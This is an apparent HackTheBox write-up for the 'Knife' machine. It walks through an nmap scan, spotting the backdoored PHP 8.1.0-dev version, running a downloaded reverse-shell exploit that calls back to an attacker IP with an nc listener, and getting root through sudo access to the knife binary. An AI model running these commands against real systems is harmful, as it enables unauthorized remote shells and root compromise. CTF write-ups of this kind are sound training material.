Knife HackTheBox Writeup
2 min readJul 28, 2021
Scan open ports
# nmap -v -sV -p- IP- -v for verbose mode.
-sV for service version detection.
-p- for all ports scan.
Here we got 2 ports are open on target.
OpenSSH is running on port no. 22 & second Apache httpd is running on 80.
Enumerate web server
view-source:http://10.10.10.242/
Check Inspect Element.
In the below screen shot X-Powered By PHP/8.1.0- dev
Now find exploit PHP/8.1.0
Exploit Link :- https://raw.githubusercontent.com/flast101/php-8.1.0-dev-backdoor-rce/main/revshell_php_8.1.0-dev.py
Download this exploit.
Run exploit
# python revshell_php_8.1.0-dev.py http://10.10.10.242 10.10.14.10 1234Setup Listener
# nc -nlvp PORT
Root Privileges Escalation
First i looked at the sudo permissions of the user.
The user could execute the binary knife as the root and without requiring his own password.
So, I created a file called “config.rb” and add the following code. in /tmp folder give the +x permissions on config.rb file.
# echo " exec "/bin/bash -i "" > config.rbNow run the following command
# sudo knife user list -c config.rb# ( sudo /usr/bin/knife exec --exec "exec '/bin/sh -i'" )
